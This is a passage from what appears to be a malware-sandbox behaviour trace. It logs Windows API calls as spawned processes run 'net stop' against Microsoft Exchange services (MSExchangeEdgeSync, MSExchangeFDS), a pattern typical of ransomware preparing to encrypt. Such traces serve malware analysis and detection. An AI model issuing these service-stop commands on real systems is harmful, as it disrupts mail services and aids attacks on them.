_String2="MSExchangeEdgeSync") returned 8 [0135.695] _wcsicmp (_String1="msg", _String2="MSExchangeEdgeSync") returned 2 [0135.695] _wcsicmp (_String1="messenger", _String2="MSExchangeEdgeSync") returned -14 [0135.695] _wcsicmp (_String1="receiver", _String2="MSExchangeEdgeSync") returned 5 [0135.695] _wcsicmp (_String1="rcv", _String2="MSExchangeEdgeSync") returned 5 [0135.695] _wcsicmp (_String1="netpopup", _String2="MSExchangeEdgeSync") returned 1 [0135.695] _wcsicmp (_String1="redirector", _String2="MSExchangeEdgeSync") returned 5 [0135.695] _wcsicmp (_String1="redir", _String2="MSExchangeEdgeSync") returned 5 [0135.695] _wcsicmp (_String1="rdr", _String2="MSExchangeEdgeSync") returned 5 [0135.695] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeEdgeSync") returned 10 [0135.695] _wcsicmp (_String1="work", _String2="MSExchangeEdgeSync") returned 10 [0135.695] _wcsicmp (_String1="wksta", _String2="MSExchangeEdgeSync") returned 10 [0135.695] _wcsicmp (_String1="prdr", _String2="MSExchangeEdgeSync") returned 3 [0135.695] _wcsicmp (_String1="devrdr", _String2="MSExchangeEdgeSync") returned -9 [0135.695] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeEdgeSync") returned -1 [0135.695] _wcsicmp (_String1="server", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="svr", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="srv", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeEdgeSync") returned -1 [0135.695] _wcsicmp (_String1="alerter", _String2="MSExchangeEdgeSync") returned -12 [0135.695] _wcsicmp (_String1="netlogon", _String2="MSExchangeEdgeSync") returned 1 [0135.695] _wcsupr (in: _String="MSExchangeEdgeSync" | out: _String="MSEXCHANGEEDGESYNC") returned="MSEXCHANGEEDGESYNC" [0135.695] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xef2638 [0135.697] GetServiceKeyNameW (in: hSCManager=0xef2638, lpDisplayName="MSEXCHANGEEDGESYNC", lpServiceName=0x10a8cb0, lpcchBuffer=0xe9faac | out: lpServiceName="", lpcchBuffer=0xe9faac) returned 0 [0135.697] _wcsicmp (_String1="msg", _String2="MSEXCHANGEEDGESYNC") returned 2 [0135.697] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEEDGESYNC") returned -14 [0135.697] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEEDGESYNC") returned 5 [0135.697] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEEDGESYNC") returned 5 [0135.697] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEEDGESYNC") returned 5 [0135.697] _wcsicmp (_String1="redir", _String2="MSEXCHANGEEDGESYNC") returned 5 [0135.697] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEEDGESYNC") returned 5 [0135.697] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEEDGESYNC") returned 10 [0135.697] _wcsicmp (_String1="work", _String2="MSEXCHANGEEDGESYNC") returned 10 [0135.698] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEEDGESYNC") returned 10 [0135.698] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEEDGESYNC") returned 3 [0135.698] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEEDGESYNC") returned -9 [0135.698] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEEDGESYNC") returned -1 [0135.698] _wcsicmp (_String1="server", _String2="MSEXCHANGEEDGESYNC") returned 6 [0135.698] _wcsicmp (_String1="svr", _String2="MSEXCHANGEEDGESYNC") returned 6 [0135.698] _wcsicmp (_String1="srv", _String2="MSEXCHANGEEDGESYNC") returned 6 [0135.698] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEEDGESYNC") returned -1 [0135.698] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEEDGESYNC") returned -12 [0135.698] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEEDGESYNC") returned 1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="WORKSTATION") returned -10 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="LanmanWorkstation") returned 1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="SERVER") returned -6 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="LanmanServer") returned 1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="BROWSER") returned 11 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="BROWSER") returned 11 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="MESSENGER") returned 14 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="MESSENGER") returned 14 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETRUN") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETRUN") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="SPOOLER") returned -6 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="SPOOLER") returned -6 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="ALERTER") returned 12 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="ALERTER") returned 12 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETLOGON") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETLOGON") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETPOPUP") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="NETPOPUP") returned -1 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="SQLSERVER") returned -6 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="SQLSERVER") returned -6 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="REPLICATOR") returned -5 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="REPLICATOR") returned -5 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="REMOTEBOOT") returned -5 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="REMOTEBOOT") returned -5 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="TIMESOURCE") returned -7 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="TIMESOURCE") returned -7 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="AFP") returned 12 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="AFP") returned 12 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="UPS") returned -8 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="UPS") returned -8 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="XACTSRV") returned -11 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="XACTSRV") returned -11 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="TCPIP") returned -7 [0135.698] _wcsicmp (_String1="MSEXCHANGEEDGESYNC", _String2="TCPIP") returned -7 [0135.698] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xef3768 [0135.699] OpenServiceW (hSCManager=0xef3768, lpServiceName="MSEXCHANGEEDGESYNC", dwDesiredAccess=0x84) returned 0x0 [0135.699] GetLastError () returned 0x424 [0135.699] CloseServiceHandle (hSCObject=0xef3768) returned 1 [0135.699] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0135.699] LoadLibraryW (lpLibFileName="NETMSG") returned 0xed0000 [0135.700] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xed0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0135.701] GetFileType (hFile=0x40) returned 0x2 [0135.701] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe9f948 | out: lpMode=0xe9f948) returned 1 [0135.701] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xe9f954, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xe9f954*=0x1e) returned 1 [0135.701] GetFileType (hFile=0x40) returned 0x2 [0135.701] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe9f948 | out: lpMode=0xe9f948) returned 1 [0135.701] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xe9f954, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xe9f954*=0x2) returned 1 [0135.702] _ultow (in: _Dest=0x889, _Radix=15333736 | out: _Dest=0x889) returned="2185" [0135.702] FormatMessageW (in: dwFlags=0x2800, lpSource=0xed0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0135.702] GetFileType (hFile=0x40) returned 0x2 [0135.702] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe9f938 | out: lpMode=0xe9f938) returned 1 [0135.702] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xe9f944, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xe9f944*=0x34) returned 1 [0135.702] GetFileType (hFile=0x40) returned 0x2 [0135.702] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe9f938 | out: lpMode=0xe9f938) returned 1 [0135.702] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xe9f944, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xe9f944*=0x2) returned 1 [0135.702] NetApiBufferFree (Buffer=0xef7f50) returned 0x0 [0135.702] NetApiBufferFree (Buffer=0xef8088) returned 0x0 [0135.703] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeEdgeSync" [0135.703] exit (_Code=2) Thread: id = 612 os_tid = 0xe70 Process: id = "197" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xf5f5000" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeFDS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9945 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9946 start_va = 0xbe0000 end_va = 0x4bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 9947 start_va = 0x4be0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 9948 start_va = 0x4c00000 end_va = 0x4c00fff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 9949 start_va = 0x4c10000 end_va = 0x4c23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 9950 start_va = 0x4c30000 end_va = 0x4c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 9951 start_va = 0x4c70000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 9952 start_va = 0x4d70000 end_va = 0x4d73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d70000" filename = "" Region: id = 9953 start_va = 0x4d80000 end_va = 0x4d80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 9954 start_va = 0x4d90000 end_va = 0x4d91fff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 9955 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9956 start_va = 0x7eac0000 end_va = 0x7eae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 9957 start_va = 0x7eae9000 end_va = 0x7eaebfff entry_point = 0x0 region_type = private name = "private_0x000000007eae9000" filename = "" Region: id = 9958 start_va = 0x7eaec000 end_va = 0x7eaecfff entry_point = 0x0 region_type = private name = "private_0x000000007eaec000" filename = "" Region: id = 9959 start_va = 0x7eaef000 end_va = 0x7eaeffff entry_point = 0x0 region_type = private name = "private_0x000000007eaef000" filename = "" Region: id = 9960 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9961 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9962 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9963 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9964 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9965 start_va = 0x4f20000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 9966 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9967 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9968 start_va = 0x50c0000 end_va = 0x51bffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 9969 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10010 start_va = 0x4be0000 end_va = 0x4beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004be0000" filename = "" Region: id = 10011 start_va = 0x4da0000 end_va = 0x4e5dfff entry_point = 0x4da0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10012 start_va = 0x4e60000 end_va = 0x4e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 10013 start_va = 0x4f30000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 10014 start_va = 0x52d0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 10015 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10016 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10017 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10018 start_va = 0x7e9c0000 end_va = 0x7eabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9c0000" filename = "" Region: id = 10019 start_va = 0x7eae6000 end_va = 0x7eae8fff entry_point = 0x0 region_type = private name = "private_0x000000007eae6000" filename = "" Region: id = 10020 start_va = 0x4bf0000 end_va = 0x4bf3fff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 10021 start_va = 0x4c00000 end_va = 0x4c03fff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 10022 start_va = 0x52e0000 end_va = 0x5616fff entry_point = 0x52e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 613 os_tid = 0xee8 [0135.870] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0135.870] __set_app_type (_Type=0x1) [0135.870] __p__fmode () returned 0x77ac4d6c [0135.870] __p__commode () returned 0x77ac5b1c [0135.870] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0135.871] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0135.871] GetCurrentThreadId () returned 0xee8 [0135.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee8) returned 0x84 [0135.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.871] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0135.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.875] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4d6f92c | out: phkResult=0x4d6f92c*=0x0) returned 0x2 [0135.876] VirtualQuery (in: lpAddress=0x4d6f933, lpBuffer=0x4d6f8e4, dwLength=0x1c | out: lpBuffer=0x4d6f8e4*(BaseAddress=0x4d6f000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.876] VirtualQuery (in: lpAddress=0x4c70000, lpBuffer=0x4d6f8e4, dwLength=0x1c | out: lpBuffer=0x4d6f8e4*(BaseAddress=0x4c70000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.876] VirtualQuery (in: lpAddress=0x4c71000, lpBuffer=0x4d6f8e4, dwLength=0x1c | out: lpBuffer=0x4d6f8e4*(BaseAddress=0x4c71000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.876] VirtualQuery (in: lpAddress=0x4c73000, lpBuffer=0x4d6f8e4, dwLength=0x1c | out: lpBuffer=0x4d6f8e4*(BaseAddress=0x4c73000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.876] VirtualQuery (in: lpAddress=0x4d70000, lpBuffer=0x4d6f8e4, dwLength=0x1c | out: lpBuffer=0x4d6f8e4*(BaseAddress=0x4d70000, AllocationBase=0x4d70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.876] GetConsoleOutputCP () returned 0x1b5 [0135.876] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.876] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0135.876] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.876] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0135.876] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.876] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.876] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.876] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.877] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.877] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.877] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.877] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0135.877] GetEnvironmentStringsW () returned 0x50c7d60* [0135.877] FreeEnvironmentStringsA (penv="A") returned 1 [0135.877] GetEnvironmentStringsW () returned 0x50c7d60* [0135.877] FreeEnvironmentStringsA (penv="A") returned 1 [0135.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d6e890 | out: phkResult=0x4d6e890*=0x94) returned 0x0 [0135.877] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0xd8, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x1, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0x1, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x0, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x40, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x40, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0x40, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegCloseKey (hKey=0x94) returned 0x0 [0135.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d6e890 | out: phkResult=0x4d6e890*=0x94) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0x40, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x1, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0x1, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x0, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x9, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x4, lpData=0x4d6e89c*=0x9, lpcbData=0x4d6e898*=0x4) returned 0x0 [0135.878] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d6e894, lpData=0x4d6e89c, lpcbData=0x4d6e898*=0x1000 | out: lpType=0x4d6e894*=0x0, lpData=0x4d6e89c*=0x9, lpcbData=0x4d6e898*=0x1000) returned 0x2 [0135.878] RegCloseKey (hKey=0x94) returned 0x0 [0135.878] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29838 [0135.878] srand (_Seed=0x5ad29838) [0135.878] GetCommandLineW () returned="/c net stop MSExchangeFDS" [0135.878] GetCommandLineW () returned="/c net stop MSExchangeFDS" [0135.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x50c9cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0135.878] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.878] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.878] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.878] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.878] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.878] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.878] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.878] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.878] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.878] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.878] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.879] 